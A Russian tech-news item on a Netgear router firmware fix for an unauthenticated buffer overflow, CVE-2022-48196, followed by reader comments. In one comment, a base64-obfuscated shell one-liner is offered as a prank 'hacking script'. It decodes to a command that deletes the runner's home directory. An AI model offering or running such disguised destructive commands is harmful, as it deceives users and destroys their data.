Компания Netgear выпустила обновление прошивок к беспроводным маршрутизаторам серий RAX40, RAX35, R6400v2, R6700v3, R6900P, R7000P, R7000, R7960P и R8000P, в которых устранена уязвимость (CVE-2022-48196), позволяющая добиться переполнения буфера без прохождения аутентификации. Технические детали и информация о наличии эксплоитов пока не приводится, но судя по выставленному уровню опасности и рекомендации незамедлительно обновить прошивку, проблема напоминает ноябрьскую уязвимость, позволявшую добиться выполнения своего кода с правами root через манипуляции во внешней сети на стороне WAN-интерфейса...

Подробнее: https://www.opennet.me/opennews/art.shtml?num=58421

• Уязвимость в устройствах Netgear, эксплуатируемая на стадии ...,Аноним, 09:34 , 03-Янв-23
  • Уязвимость в устройствах Netgear, эксплуатируемая на стадии ...,Аноним, 09:39 , 03-Янв-23
  • Уязвимость в устройствах Netgear, эксплуатируемая на стадии ...,Аноним, 09:39 , 03-Янв-23
  • Уязвимость в устройствах Netgear, эксплуатируемая на стадии ...,Аноним, 11:53 , 03-Янв-23
    • Уязвимость в устройствах Netgear, эксплуатируемая на стадии ...,aploskov.dev, 13:30 , 03-Янв-23
• Уязвимость в устройствах Netgear, эксплуатируемая на стадии ...,Аноним, 10:32 , 03-Янв-23
  • Уязвимость в устройствах Netgear, эксплуатируемая на стадии ...,Аноним, 12:31 , 03-Янв-23
  • Уязвимость в устройствах Netgear, эксплуатируемая на стадии ...,Аноним, 12:40 , 03-Янв-23
    • Уязвимость в устройствах Netgear, эксплуатируемая на стадии ...,Кирилл, 12:49 , 04-Янв-23
• Уязвимость в устройствах Netgear, эксплуатируемая на стадии ...,InuYasha, 11:30 , 03-Янв-23
• Уязвимость в устройствах Netgear, эксплуатируемая на стадии ...,Аноним, 11:56 , 03-Янв-23
  • Уязвимость в устройствах Netgear, эксплуатируемая на стадии ...,Атон, 14:29 , 03-Янв-23
• Уязвимость в устройствах Netgear, эксплуатируемая на стадии ...,Аноним, 14:11 , 03-Янв-23
  • Уязвимость в устройствах Netgear, эксплуатируемая на стадии ...,Аноним, 00:59 , 04-Янв-23
    • Уязвимость в устройствах Netgear, эксплуатируемая на стадии ...,Аноним, 09:52 , 04-Янв-23
• Уязвимость в устройствах Netgear, эксплуатируемая на стадии ...,Аноним, 18:51 , 03-Янв-23
  • Уязвимость в устройствах Netgear, эксплуатируемая на стадии ...,Аноним, 21:40 , 03-Янв-23
  • Уязвимость в устройствах Netgear, эксплуатируемая на стадии ...,Аноним, 00:21 , 04-Янв-23
• Уязвимость в устройствах Netgear, эксплуатируемая на стадии ...,Омоним, 02:59 , 06-Янв-23

Готовый скрипт есть у кого? Чтобы сразу запустил, и всех поломал, не вникая в скучные детали?

Да

Кнопка "сделать мне всё за***сь"? Вернее, "сделать меня кулхацкором"

HACK=`echo "ZGF0ZQo=" | base64 -d`; sh -c $HACK

Тогда уж, чтоб запомнилось.

HACK=`echo 'cm0gLXJmICIvaG9tZS8kVVNFUi8qIg==' | base64 -d`; sh -c $HACK

хорошая закладка для господина Майора... хорошая.
Теперь прийдется новую делать - отстой..

прежнего майора повысили, не гоже оставлять свои наработки для молодняка

Ты что это же теория заговора, ай-яй-яй. Ты же знаешь что теорий заговора не существует, а тебе должно быть стыдно за то что ты поднял голову и начал ей думать самостоятельно.

О том и речь, что конспирология и "думать головой" - это вещи взаимоисключающие.

Эти хоть патчат - и то молодцы.

>CVE-2022-48196
>2022

А обновление выпущено в 2023, а не в тот же день! Если об уязвимости они узнали не за час до Нового Года, то оперативность просто поражает. За такой интервал всех, кого нужно, уже поимели.

> Если об уязвимости они узнали не за час до Нового Года, то оперативность просто поражает. За такой интервал всех, кого нужно, уже поимели.

Всех, кого нужно, поимели задолго до того.  Так и узнали об уязвимости.

> переполнения буфера

Годы идут, но нестареющая классика продолжает радовать людей.

Буфера всегда радуют. Ну где-то с 13 лет и до самой старости.

Особенно, когда удаётся выйти за границы буфера.

Даже у нетгира нет денег и авторитета нанять настоящих сишников…

Ору.

Да они так то довольно среднепаршивая фирма. По жизни всякая хня с прошивками.

Пластик у Netgear-овского железа - просто оцтой. А тут еще и вот это сцамое.